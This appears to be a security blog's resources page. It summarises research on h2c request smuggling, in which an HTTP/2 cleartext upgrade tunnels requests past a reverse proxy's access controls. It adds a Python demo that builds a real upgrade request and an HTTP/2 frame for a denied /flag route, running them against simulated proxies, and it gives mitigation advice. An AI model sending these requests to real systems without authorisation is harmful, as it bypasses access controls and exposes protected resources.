Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

h2c Smuggling: Request Smuggling Via HTTP/2 Cleartext (h2c)

Jake Miller, posted 4 years ago
  • Where does one request start and the next one end? Disagreement between HTTP implementations on that question is the root of the bug class known as HTTP request smuggling. The author of this article extended that research and found a related issue in HTTP/2 cleartext (h2c).
  • Separately, another researcher had shown in this article that requests could be smuggled over WebSocket connections to bypass reverse-proxy access controls. That technique hinged on how the proxy handled the WebSocket upgrade.
  • HTTP/2 is normally negotiated during the TLS handshake. h2c instead starts as an ordinary HTTP/1.1 request carrying an Upgrade: h2c header, and many servers honour that upgrade even on a connection that is already protected by TLS. No off-the-shelf client would send that combination, so the author had to write a custom client to test it.
  • The author then asked whether the protocol-upgrade trick used against WebSockets would also work with an HTTP/2 upgrade. To find out, they set up an Nginx reverse proxy that denied one route (/flag) but allowed the others; a direct request to /flag through the proxy returned a 403.
  • The technique worked with the following steps:
    1. The client sends the proxy an HTTP/1.1 request on an allowed path, carrying Upgrade: h2c and Connection: Upgrade, HTTP2-Settings.
    2. The proxy forwards the Upgrade and Connection headers to the backend, which answers 101 Switching Protocols and starts expecting HTTP/2 frames on the connection.
    3. On seeing the backend's 101, the proxy stops parsing HTTP and turns the connection into an unmanaged TCP tunnel.
    4. Over that tunnel, now speaking HTTP/2, the client opens a stream for /flag. The proxy is no longer inspecting the bytes, so its deny rule never fires and the backend returns the flag.
  • The crux of the issue is that a 101 turns the proxied connection into an unmanaged TCP tunnel. Upgrade and Connection are hop-by-hop headers, so a proxy must not blindly pass the client's copies through to the backend; in practice that means forwarding an Upgrade only on routes that genuinely need one (WebSocket endpoints), never as a blanket proxy setting. Of the proxies the author tested, only three strip these headers by default; most of the rest forward them, though they can be configured not to.
  • Bypassing access controls via tunnelling is quite clever. The author took existing research and applied it to a neighbouring protocol; it pays to read existing research and try small variations on it.
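To make the four steps concrete, here is an added example written for this page (it is not code from the article, nor the author's own h2c tooling): an in-process toy reverse proxy and toy backend in Python. It builds the real HTTP/1.1 h2c upgrade request (including the base64url HTTP2-Settings value that RFC 7540 section 3.2.1 requires) and a real HTTP/2 HEADERS frame for /flag (HPACK literal encoding, no Huffman), then runs the same two-message exchange twice: once through a proxy that forwards Upgrade/Connection (step 3 happens and /flag is served) and once through a proxy that strips them as hop-by-hop headers (the /flag request is still parsed and denied). The host name victim.example, the /flag route and the "served ..." bodies are constructed for the demo; nothing here touches the network.

```python
import base64
import struct

# Added example, not code from the original article. The proxy, the backend,
# the host victim.example and the /flag route are all constructed for the demo.

H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
HOP_BY_HOP = {"upgrade", "connection", "http2-settings"}  # must die at the proxy


def http2_settings_header(max_streams=100):
    """HTTP2-Settings value: base64url, no padding, of a SETTINGS payload (RFC 7540 s3.2.1)."""
    payload = struct.pack(">HI", 3, max_streams)  # id 3 = SETTINGS_MAX_CONCURRENT_STREAMS
    return base64.urlsafe_b64encode(payload).rstrip(b"=").decode()


def build_h2c_upgrade_request(host, path="/"):
    """The HTTP/1.1 request that asks the server to switch this connection to h2c."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\nUpgrade: h2c\r\n"
            "Connection: Upgrade, HTTP2-Settings\r\n"
            f"HTTP2-Settings: {http2_settings_header()}\r\n\r\n").encode()


def hpack_literal(name, value):
    """HPACK literal field without indexing, new name, no Huffman (RFC 7541 s6.2.2); lengths < 127."""
    return b"\x00" + bytes([len(name)]) + name + bytes([len(value)]) + value


def build_h2_headers_frame(path, authority, stream_id=1):
    """HEADERS frame (type 0x1, flags END_STREAM|END_HEADERS) carrying a GET for `path`."""
    block = b"".join(hpack_literal(n, v) for n, v in (
        (b":method", b"GET"), (b":scheme", b"http"), (b":authority", authority), (b":path", path)))
    return struct.pack(">I", len(block))[1:] + b"\x01\x05" + struct.pack(">I", stream_id) + block


def h2_paths(raw):
    """:path of every HEADERS frame after the preface; decodes only the literal form built above."""
    paths, i = [], len(H2_PREFACE)
    while i + 9 <= len(raw):
        length = int.from_bytes(raw[i:i + 3], "big")
        ftype, block = raw[i + 3], raw[i + 9:i + 9 + length]
        i += 9 + length
        if ftype != 0x1:
            continue
        j = 0
        while j < len(block):
            nlen = block[j + 1]; name = block[j + 2:j + 2 + nlen]; j += 2 + nlen
            vlen = block[j]; value = block[j + 1:j + 1 + vlen]; j += 1 + vlen
            if name == b":path":
                paths.append(value)
    return paths


def parse_h1(raw):
    """Minimal HTTP/1.1 request parser: returns (path, {lowercased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    request_line, *header_lines = head.split("\r\n")
    path = request_line.split(" ")[1]
    headers = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in header_lines)}
    return path, headers


def backend(raw):
    """Toy origin: honours an h2c upgrade, otherwise serves whatever path it is asked for."""
    if raw.startswith(H2_PREFACE):  # connection already switched to HTTP/2
        return (200, "served " + h2_paths(raw)[0].decode())
    path, headers = parse_h1(raw)
    if headers.get("upgrade") == "h2c" and "upgrade" in headers.get("connection", "").lower():
        return (101, "")  # 101 Switching Protocols; HTTP/2 frames follow on this connection
    return (200, "served " + path)


class Proxy:
    """Denies /flag. Forwards the client's Upgrade/Connection only when forward_upgrade is True."""

    def __init__(self, forward_upgrade):
        self.forward_upgrade, self.tunnel = forward_upgrade, False

    def handle(self, raw):
        if self.tunnel:  # a 101 was seen earlier: bytes are relayed without inspection
            return backend(raw)
        path, headers = parse_h1(raw)
        if path.startswith("/flag"):
            return (403, "forbidden")
        if not self.forward_upgrade:  # hardened: hop-by-hop headers are dropped here
            headers = {k: v for k, v in headers.items() if k not in HOP_BY_HOP}
        forwarded = (f"GET {path} HTTP/1.1\r\n"
                     + "".join(f"{k}: {v}\r\n" for k, v in headers.items()) + "\r\n").encode()
        status, body = backend(forwarded)
        self.tunnel = status == 101  # the proxy stops parsing HTTP from here on
        return (status, body)


def run_scenario(forward_upgrade):
    """Attacker's view: upgrade on an allowed path, then ask for /flag. Returns both replies."""
    proxy = Proxy(forward_upgrade)
    first = proxy.handle(build_h2c_upgrade_request("victim.example", "/"))
    if first[0] == 101:  # upgrade accepted: speak HTTP/2 over the now-blind tunnel
        second = proxy.handle(H2_PREFACE + build_h2_headers_frame(b"/flag", b"victim.example"))
    else:  # upgrade refused: the only option is a normal request, which the proxy inspects
        second = proxy.handle(b"GET /flag HTTP/1.1\r\nHost: victim.example\r\n\r\n")
    return [first, second]
```

With forward_upgrade=True the second reply is the backend serving /flag; with forward_upgrade=False it is the proxy's 403. Against a real deployment, the same first message (the output of build_h2c_upgrade_request) sent to a route that is not a WebSocket endpoint is the check: a 101 coming back means the proxy forwarded the upgrade and will tunnel whatever follows.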